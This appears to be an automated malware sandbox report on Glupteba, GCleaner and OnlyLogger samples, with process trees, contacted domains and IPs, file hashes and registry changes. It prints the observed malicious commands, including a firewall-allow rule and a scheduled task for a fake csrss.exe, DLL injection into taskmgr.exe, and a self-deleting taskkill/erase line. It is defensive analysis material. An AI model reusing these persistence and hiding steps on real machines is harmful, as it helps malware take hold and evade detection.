C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2200 -ip 2200
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2200 -s 568
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 2200 -ip 2200
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2200 -s 576
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 2200 -ip 2200
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2200 -s 864
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2200 -ip 2200
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2200 -s 752
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2200 -ip 2200
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2200 -s 1440
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2200 -ip 2200
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2200 -s 1464
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2200 -ip 2200
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2200 -s 1496
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /133-133
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4508 -ip 4508
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 368
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4508 -ip 4508
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 384
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4508 -ip 4508
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 368
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4508 -ip 4508
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 604
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4508 -ip 4508
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4508 -ip 4508
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 728
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4508 -ip 4508
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 720
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4508 -ip 4508
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 696
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4508 -ip 4508
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 760
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 4508 -ip 4508
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 756
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4508 -ip 4508
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 760
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4508 -ip 4508
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4508 -ip 4508
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 892
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4508 -ip 4508
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 620
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4508 -ip 4508
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 940
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4508 -ip 4508
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 980
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4508 -ip 4508
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 992
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4508 -ip 4508
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 924
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4508 -ip 4508
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 992
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4508 -ip 4508
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4508 -ip 4508
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 1536
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4508 -ip 4508
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 1552
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4508 -ip 4508
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 1520
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4508 -ip 4508
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 1580
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4508 -ip 4508
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 1644
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4508 -ip 4508
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 1020
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4508 -ip 4508
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 1660
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4508 -ip 4508
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 1648
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4508 -ip 4508
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 464
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4508 -ip 4508
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 1644
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | humisnee.com | udp |
| NL | 37.48.65.151:443 | humisnee.com | tcp |
| US | 8.8.8.8:53 | 151.65.48.37.in-addr.arpa | udp |
| US | 8.8.8.8:53 | survey-smiles.com | udp |
| US | 199.59.243.227:80 | survey-smiles.com | tcp |
| US | 8.8.8.8:53 | 227.243.59.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ninhaine.com | udp |
| US | 8.8.8.8:53 | 2makestorage.com | udp |
| US | 8.8.8.8:53 | nisdably.com | udp |
| US | 8.8.8.8:53 | f11d6cfd-29ad-457d-94d7-d17bec6bfaf7.ninhaine.com | udp |
| US | 8.8.8.8:53 | server14.ninhaine.com | udp |
| CZ | 46.8.8.100:443 | server14.ninhaine.com | tcp |
| CZ | 46.8.8.100:443 | server14.ninhaine.com | tcp |
| CZ | 46.8.8.100:443 | server14.ninhaine.com | tcp |
| CZ | 46.8.8.100:443 | server14.ninhaine.com | tcp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.8.8.46.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.117.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ww82.ninhaine.com | udp |
| US | 199.59.243.227:80 | ww82.ninhaine.com | tcp |
| US | 199.59.243.227:80 | ww82.ninhaine.com | tcp |
| US | 199.59.243.227:80 | ww82.ninhaine.com | tcp |
| US | 199.59.243.227:80 | ww82.ninhaine.com | tcp |
| US | 8.8.8.8:53 | spolaect.info | udp |
| US | 199.59.243.227:80 | ww82.ninhaine.com | tcp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| CZ | 46.8.8.100:443 | server14.ninhaine.com | tcp |
| US | 199.59.243.227:80 | ww82.ninhaine.com | tcp |
| US | 8.8.8.8:53 | server14.2makestorage.com | udp |
Files
memory/972-1-0x0000000003F80000-0x00000000043C3000-memory.dmp
memory/972-2-0x00000000043D0000-0x0000000004CF6000-memory.dmp
memory/972-3-0x0000000000400000-0x0000000000D41000-memory.dmp
memory/972-7-0x00000000043D0000-0x0000000004CF6000-memory.dmp
memory/972-6-0x0000000000400000-0x0000000000D41000-memory.dmp
memory/972-5-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/2200-8-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/2200-9-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/2200-10-0x0000000000400000-0x00000000021A3000-memory.dmp
C:\Windows\rss\csrss.exe
| MD5 | 1485d115c0db789ed882e6da39b845d0 |
| SHA1 | b25ee4515f5a1a8b420e7eba38f233ee64a24755 |
| SHA256 | 036e1c48be2a9fde1e94334dcb1216eec8512b38c118234c118aaa47b6ad65c7 |
| SHA512 | c8571df02ca3c8d69c49393d45a032a291c6f5c7100564e9a1337f287abd195c903bf86a20217990de38627d2a646dc7dde0e3953827afa94db270124c1f559b |
memory/2200-14-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/4508-17-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/4508-18-0x0000000000400000-0x00000000021A3000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
| MD5 | d98e33b66343e7c96158444127a117f6 |
| SHA1 | bb716c5509a2bf345c6c1152f6e3e1452d39d50d |
| SHA256 | 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1 |
| SHA512 | 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5 |
memory/4508-24-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/4508-25-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/4508-26-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/4508-27-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/4508-28-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/4508-29-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/4508-30-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/4508-31-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/4508-32-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/4508-33-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/4508-34-0x0000000000400000-0x00000000021A3000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-08 09:08
Reported
2024-11-08 09:11
Platform
win7-20241010-en
Max time kernel
121s
Max time network
127s
Command Line
Signatures
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\DusBrowserInst.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\DusBrowserInst.exe
"C:\Users\Admin\AppData\Local\Temp\DusBrowserInst.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | one-online-gam3s.com | udp |
| US | 8.8.8.8:53 | oneeuropegroup.xyz | udp |
| US | 8.8.8.8:53 | eurovegas.xyz | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
Files
memory/3056-0-0x000007FEF5EF3000-0x000007FEF5EF4000-memory.dmp
memory/3056-1-0x00000000011A0000-0x00000000011D4000-memory.dmp
memory/3056-2-0x0000000000250000-0x0000000000256000-memory.dmp
memory/3056-3-0x00000000003F0000-0x0000000000416000-memory.dmp
memory/3056-4-0x0000000000260000-0x0000000000266000-memory.dmp
memory/3056-5-0x000007FEF5EF0000-0x000007FEF68DC000-memory.dmp
memory/3056-6-0x000007FEF5EF3000-0x000007FEF5EF4000-memory.dmp
memory/3056-7-0x000007FEF5EF0000-0x000007FEF68DC000-memory.dmp
memory/3056-8-0x000007FEF5EF0000-0x000007FEF68DC000-memory.dmp
Analysis: behavioral27
Detonation Overview
Submitted
2024-11-08 09:08
Reported
2024-11-08 09:11
Platform
win7-20240903-en
Max time kernel
129s
Max time network
128s
Command Line
Signatures
GCleaner
Gcleaner family
OnlyLogger
Onlylogger family
OnlyLogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\mixseven.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\mixseven.exe
"C:\Users\Admin\AppData\Local\Temp\mixseven.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{UNXI-UCqEo-zTQz-VSyTP}\83037447545.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{UNXI-UCqEo-zTQz-VSyTP}\63380486510.exe" /mix
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{UNXI-UCqEo-zTQz-VSyTP}\66353213945.exe" /mix
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "mixseven.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\mixseven.exe" & exit
C:\Windows\SysWOW64\taskkill.exe
taskkill /im "mixseven.exe" /f
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | garbage-cleaner.biz | udp |
| UA | 194.145.227.161:80 | 194.145.227.161 | tcp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.3.46:80 | iplogger.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
Files
memory/2904-1-0x0000000000230000-0x0000000000330000-memory.dmp
memory/2904-2-0x00000000003A0000-0x00000000003D0000-memory.dmp
memory/2904-3-0x0000000000400000-0x0000000000432000-memory.dmp
memory/2904-4-0x0000000000230000-0x0000000000330000-memory.dmp
memory/2904-5-0x00000000003A0000-0x00000000003D0000-memory.dmp
memory/2904-7-0x0000000000400000-0x0000000000432000-memory.dmp
memory/2904-6-0x0000000000400000-0x0000000001D82000-memory.dmp
memory/2904-18-0x0000000000400000-0x0000000001D82000-memory.dmp
C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe
| MD5 | 6445250d234e789c0c2afe69f119e326 |
| SHA1 | 03074f75c0ff50783d8c2e32d96e39b746540f66 |
| SHA256 | 2e6cd9433e66a9ebde268bc6949d4660de441790bd39ffc9cb0f4caaeb44320f |
| SHA512 | ecd094a4d026378f85435f8a2dc16c92c033aff92ba126d8bbb22d6b279b842d417f4df0f63199ea248d0ec64b9679acb5a1f835560d8e3c5b84be492cc0e68e |
memory/2904-41-0x0000000000400000-0x0000000000432000-memory.dmp
memory/2904-40-0x0000000000230000-0x0000000000330000-memory.dmp
memory/2904-39-0x0000000000400000-0x0000000001D82000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-11-08 09:08
Reported
2024-11-08 09:11
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
133s
Command Line
Signatures
Glupteba
Glupteba family
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
MetaSploit
Metasploit family
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\rss\csrss.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PurpleFire = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
Checks installed software on the system
Manipulates WinMonFS driver.
| Description | Indicator | Process | Target |
| File opened for modification | \??\WinMonFS | C:\Windows\rss\csrss.exe | N/A |
Checks for VirtualBox DLLs, possible anti-VM trick
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\rss\csrss.exe | N/A |
GoLang User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-251 = "Dateline Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-362 = "GTB Standard Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2872 = "Magallanes Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1931 = "Russia TZ 11 Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-452 = "Caucasus Standard Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-105 = "Central Brazilian Standard Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-2001 = "Cabo Verde Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-384 = "Namibia Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2372 = "Easter Island Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-2491 = "Aus Central W. Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-141 = "Canada Central Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-561 = "SE Asia Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-751 = "Tonga Daylight Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1502 = "Turkey Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-842 = "Argentina Standard Time" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-215 = "Pacific Standard Time (Mexico)" | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
